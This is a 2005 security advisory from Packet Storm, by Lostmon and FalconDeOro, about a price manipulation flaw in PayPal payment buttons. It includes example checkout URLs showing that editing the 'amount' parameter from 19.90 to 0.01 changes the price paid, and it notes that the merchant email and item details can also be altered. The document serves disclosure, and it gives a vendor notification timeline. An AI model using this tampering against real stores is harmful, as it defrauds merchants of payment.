paypalFlaw.txt

2005-08-14T00:00:00
ID PACKETSTORM:39358
Type packetstorm
Reporter Lostmon
Modified 2005-08-14T00:00:00

Description

                                        
                                            `##############################################  
PayPal 'butons' price manipulation.  
vendor url:https://www.paypal.com/  
http://lostmon.blogspot.com/2005/05/  
paypal-arbitrary-price-manipulation.html  
vendor notify: yes exploit available: yes  
Discovered by FalconDeOro(1) and Lostmon(2)   
##############################################  
  
PayPal buttons are prone to price manipulation.  
all stores based on PayPal buttons are posible   
vulnerables to this flaw.  
  
  
##########################  
code example of a button  
##########################  
the proof is based on this form:  
  
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside  
  
in the exmple of explotation we used "PayPal price manipulation kit "  
program to shop.  
This is Non existent product...  
  
the link of the button for shopping have this url:  
(1)  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=19.90&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
  
this is the normal price for the product (19.90$) but...   
if we change 'amount' variable to 0.01 the product now cost 0.01$  
  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=0.01&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
another way to exploiting this situation:  
  
(2)  
this other example coming from a stored based on paypal:  
  
https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]  
&item_name=PayPal+price+manipulation+ kit&item_number=  
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0  
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD  
  
if we look we can change not only the price , we can change the email account  
name of product, and other details.  
for shopping you need an account on PayPal.  
  
#############  
timeline:  
#############  
  
discovered: 14 may 2005  
vendor notify: 25 may 2005  
Vendor response: 26 may 2005  
disclosure: 27 may 2005  
  
  
################### End ####################  
  
thnx to estrella to be my ligth  
thnx to icaro he is my support  
Thnx to FalconDeOro ... patience.  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
  
contact to FalconDeOro  
(falcondeoro@gmail.com)  
http://falcondeoro.blogspot.com  
  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente  
`